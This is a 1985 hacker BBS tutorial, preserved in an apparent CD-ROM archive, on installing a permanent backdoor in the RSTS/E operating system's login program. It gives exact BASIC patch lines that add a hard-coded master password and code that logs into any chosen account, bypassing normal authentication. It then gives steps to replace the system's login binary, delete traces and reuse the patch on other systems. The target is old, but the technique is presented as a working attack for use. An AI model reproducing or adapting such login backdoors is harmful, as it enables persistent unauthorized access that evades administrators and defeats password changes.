home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / systems / rsts3.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  8.6 KB  |  219 lines
  1.  
  2.  
  3. ShadowSpawn BBS Presents...
  4.  
  5. -------------------------------------------------------------------------------
  6.  
  7.                         INSIDE RSTS/E  VOLUME III
  8.                         -------------------------
  9.  
  10.                             BY: THE MARAUDER
  11.  
  12.                       THE COUNCIL OF THE FEDERATION
  13.  
  14.  The information in this document is intended for informational purposes only
  15.  
  16.             COPYRIGHT (C) - SEPTEMBER 13, 1985, ZONE COMMUNICATIONS
  17. -------------------------------------------------------------------------------
  18.  
  19.      This tutorial will deal with a subject many talk about, but few have
  20. actually accomplished, installing a true back door into an operating system.
  21.  
  22.      I will assume you have managed to get a privleged account on a RSTS/E
  23. system, and have a working knowledge of the basic system commands, and are
  24. somewhat familiar with a RSTS/E based text editor, such as TECO, or EDT.
  25. This procedure should work on all versions of RSTS/E between  V6.0-00, And
  26. V8.5-00.
  27.  
  28.  
  29. 1) GETTING STARTED.
  30.  
  31.      Before you actually attempt to install the patches, you need to know a
  32. few things first.. Do the following "test's"..
  33.  
  34. A) before you are logged in, type any charachter followed by a <c/r>
  35.   the system will do 1 of two things, it will either respond with a
  36.   'Please say HELLO', or you will get the system header and the login
  37.   prompt, make a note of which..
  38.  
  39. B) before you are logged in, type 'HELLO', or 'LOGIN' followed by a <c/r>
  40.    The system will respond with one of two possible system headers..
  41.  
  42.   INTELL CORP.. RSTS/E V7.0-01  KB7:  <DIALUP>  20-MAR-85  10:47: PM
  43.   #
  44.                    OR
  45. INTELL CORP.. RSTS/E V7.0-01  KB7:   <DIALUP>   20-MAR-85 10:47 PM
  46. User:
  47.  
  48. Make a note of which login prompt you get, either a '#', or 'User: '.
  49.  
  50. You'll need this when installing the patches..
  51.  
  52.  
  53. 2) FINDING LOGIN.
  54.  
  55.      Once you have made the above tests, log into your privleged account
  56. and now you must find the basic source code for the rsts/e login program
  57. which is 'login.Bas', or on some systems 'login.B2s'.  I have generally
  58. found most basic source files located in either '(1,200)', or 'DB1:(1,200)'
  59. so look there first. If you don't find a copy in either of those accounts
  60. then do a 'dir (*,*)login.*', Or a 'dir db1:(*,*)login.*'. If neither of these
  61. directory lookups show up with 'login.Bas' then you either have to upload
  62. your own copy (incidentally, all rsts/e source files are ascii.). Or you're
  63. out of luck.. (But don't panic, most systems do keep a copy of their basic
  64. programs on-line).. Note: if there are more than two drives (db1, db2), you
  65. should search these also.. (Ie. Db3:, db4:, etc..).
  66.  
  67. 3) INSTALLING THE 'BACKDOOR' ITSELF.
  68.  
  69.      Once you have found a copy of login.Bas, move it into your account
  70. with pip, (ie. PIP LOGIN.BAS=(*,*)LOGIN.BAS, where (*,*) = the account it's
  71. currently in.). If you have uploaded it then skip that step..
  72.  
  73.   Now you must use one of the systems text editors to install the patches
  74. I preffer TECO. So here you do your 'TECO LOGIN.BAS' and you're ready to
  75. go..
  76.  
  77.      First of all, you must decide on a password that you would like to use
  78. I usually like to use passwords that 'include' the special charachters not
  79. allowed in normal rsts/e passwords, (ie. #,%,&,*,!).  Once you have decided
  80. on the password you'd like (make it a good one, cause it will be permanent).
  81.  You are ready to start the 'patching'..
  82.  
  83. Follow the next steps exactly, and type everything exactly as I have it.
  84. (I will be using '%%ZONE' as my 'BACKDOOR' password..)
  85.  
  86. A) INSERT A LINE #110, HERE PUT IN 'BD$ = "WHATEVER PASSWORD YOU CHOSE"
  87.    IE.   110 BD$ = "%%ZONE"
  88.  
  89. B) at line 12000, count down to the 12th statement for that line.
  90.    It should look something like:
  91.  
  92.     / WAIT 30 UNLESS A%
  93.     / INPUT LINE #1%, P$
  94.     / P$=CVT$$(P$,1%+4%+8%+16+32%+128%+256%)
  95.  
  96.   Directly after the line that reads '/INPUT LINE #1%,P$', you will insert the
  97. following line.
  98.  
  99.     / GOTO 12011 IF LEFT(CVT$$(P$,-1%),LEN(BD$)) = BD$
  100.  
  101.  So now it should read..
  102.  
  103.      / INPUT LINE #1%, P$
  104.      / GOTO 12011 IF LEFT(CVT$$(P$,-1%),LEN(BD$))=BD$
  105.      / P$ = CVT$$(P$,1%+4%+8%+16%+32%+128%+256%)
  106.  
  107. C) now insert a line 12011, and type it EXACTLY as follows.
  108.  
  109. 12011 I$=SYS(PRIV.ON$)
  110.       / I$=SYS(CHR$(2%))
  111.       / PRINT
  112.       / INPUT "ACCOUNT #";PROJ%,PROG%
  113.       / DIM M1%(30%)
  114.       / M1%(X%)=0% FOR X% = 1% TO 30%
  115.       / M1%(0%) = 9%
  116.       / M1%(1%) = 6%
  117.       / M1%(2%) = 14%
  118.       / M1%(7%) = PROG%
  119.       / M1%(8%) = PROJ%
  120.       / CHANGE M1% TO M$
  121.       / T$ = SYS(M$)
  122.       / PS$ = MID(T$,9%,4%)
  123.       / M$ = CHR$(6%)+CHR$(4%)+STRING$(2%,0%)+CHR$(PROG%)+CHR$(PROJ%)+PS$
  124.       / I$ = SYS(M$)
  125.       / I$ = SYS(CHR$(9%))
  126.       / GOTO 32767
  127.  
  128.  (The previous line of code is what actually does the password lookup, and
  129.   the login, bypassing login's normal security procedure, for those who care.)
  130.  
  131. D) Now, here's where you use the information you got in step 1,
  132.   1) LIST LINE 32600
  133.  If the system you are patchng gave you the login prompt when you hit
  134. Any charachter followed by a <c/r> before you were logged in, and line
  135. 32600 Reads.
  136.                  32600 Q$=CHR$(9%)
  137.                  / PRINT FNC$;"PLEASE SAY HELLO"
  138.                  / TIMEOUT% = 17%
  139. Insert the following statement.
  140.  
  141.                32600 Q$=CHR$(9%)
  142.                / GOTO 200   <---- INSERT THIS STATEMENT
  143.                / PRINT FNC$;"PLEASE SAY HELLO"
  144.                / TIMEOUT% = 17%
  145.  
  146.  If the system printed 'Please say HELLO', upon entering any charachter
  147. before being logged in, -DO NOT- change this line.
  148.  
  149.  2) List line 11000, the second statement should be one of the following
  150.      / PRINT FNC$;"USER: ";        OR     / PRINT FNC$;"#";
  151.  
  152.    If the login prompt you got in step 1 was "#", then change that statement
  153.    To read '/ PRINT FNC$;"#"'  (if it dosn't already read that way)
  154.  
  155.   If you got a "User: " prompt in step #1, then change that statement to read
  156.      '/ PRINT FNC$;"User: "'             (** note the space after the ':')
  157.  
  158.  Now, save the program and exit out of the text editor, once you are in basic
  159. do the following..
  160. (I will assume we saved the file under the name: "LOGIN1.BAS")
  161.  
  162.    1) TYPE "OLD LOGIN1.BAS"
  163.  
  164.       If you made any syntax errors, here's where they will show up.  If you
  165. have any errors, go back and correct them with the text editor..
  166.  
  167. 2) Once you have succesfully loaded the program into basic (using 'old'), type
  168.  
  169.   'COMPILE', followed by a <c/r>.  This will compile the program into machine
  170. Language, and automatically save a copy in your account under the extension
  171. '.BAC', so if I had loaded 'LOGIN1.BAS' (ie. OLD LOGIN1.BAS'), into memory
  172. and typed 'COMPILE', I would now have a compiled copy in my account under the
  173. name 'login1.Bac' (.Bac = basic compiled, by the way).
  174.  
  175. E) SWAPPING THE PROGRAMS..
  176.  
  177.  Once you have succesfully gotten this far, the last step is to swap your
  178. 'doctored' copy of login, with the systems copy of login, you do this simply
  179. by typing: "PIP (1,2)LOGIN.* = LOGIN1.BAC" (assuming you are in the same
  180. account that your copy of 'login1.Bac' is in.. Now the patch is complete
  181. download a copy of your 'patched' basic source, for use on other systems you
  182. may run across.., And then delete all copies of it.. (Except the one you pipped
  183. to account (1,2), of course.)
  184.  
  185. F) USING THE 'BACKDOOR'
  186.  
  187.       To use the backdoor, you simply enter any 'valid' account on the system
  188. when it asks 'user: ', or print's a "#", waiting for your account #, then when
  189. it asks for a password you type in your 'backdoor' password, and login will
  190. print 'enter account #', here type in whichever account you would like to get
  191. into (ie, 1,2 - 1,3 - 1,4 - etc...) And you will be automatically logged into
  192. that account, it should rememble something like this..
  193.  
  194. (STARTING LOGGED OUT OF COURSE..)
  195. HELLO
  196.  
  197.  
  198. INTELL CORP.. RSTS/E V7.9 KB17: <DIALUP> JOB 6 20-JUN-85 10:46 PM
  199. USER: 1,2 <C/R>                 (1,2 IS ENTERED BY YOU)
  200. PASSWORD: %%ZONE <C/R>         (%%ZONE IS ENTERED BY YOU, AND WON'T ECHO)
  201. ACCOUNT # 1,2 <C/R>             (1,2 IS ENTERED BY YOU)
  202.  
  203. NOW YOU WILL GET THE 'READY' PROMPT, AND BE LOGGED INTO ACCOUNT 1,2..
  204.  
  205.  
  206.  Now you have full acess to the system no matter what they change any password
  207. to, and for as long as they remain using any version of RSTS/E under V9.0..
  208.  
  209.            So until next time..
  210.                                       Dial with care.......
  211.  
  212.                                        THE
  213.                                          MARAUDER
  214.                                 COUNCIL OF THE FEDERATION
  215.  
  216. -------------------------------------------------------------------------------
  217.  
  218.  
  219.